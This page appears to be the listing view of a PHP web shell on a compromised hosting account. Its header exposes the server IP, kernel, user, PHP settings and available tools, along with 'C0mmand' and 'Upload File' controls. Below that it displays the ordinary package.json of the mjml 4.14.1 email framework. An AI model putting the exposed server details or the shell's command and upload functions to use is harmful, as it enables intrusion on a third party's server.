Server IP : 92.205.26.207 / Your IP : 216.73.216.16 Web Server : Apache System : Linux 207.26.205.92.host.secureserver.net 4.18.0-553.60.1.el8_10.x86_64 #1 SMP Thu Jul 10 04:01:16 EDT 2025 x86_64 User : zikryat ( 1002) PHP Version : 8.3.23 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/zikryat/public_html/node_modules/mjml/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
{ "name": "mjml", "description": "MJML: the only framework that makes responsive-email easy", "version": "4.14.1", "main": "lib/index.js", "bin": { "mjml": "bin/mjml" }, "files": [ "bin", "lib" ], "repository": { "type": "git", "url": "git+https://github.com/mjmlio/mjml.git", "directory": "packages/mjml" }, "license": "MIT", "bugs": { "url": "https://github.com/mjmlio/mjml/issues" }, "homepage": "https://mjml.io", "scripts": { "clean": "rimraf lib", "build": "babel src --out-dir lib --root-mode upward", "test": "node ./test/index.js" }, "dependencies": { "@babel/runtime": "^7.14.6", "mjml-cli": "4.14.1", "mjml-core": "4.14.1", "mjml-migrate": "4.14.1", "mjml-preset-core": "4.14.1", "mjml-validator": "4.13.0" }, "devDependencies": { "@babel/cli": "^7.8.4", "chai": "^4.1.1", "chai-spies": "^1.0.0", "cheerio": "1.0.0-rc.12", "lodash": "^4.17.21", "rimraf": "^3.0.2" }, "gitHead": "988819de3375867c09585d28f555166b97415200" }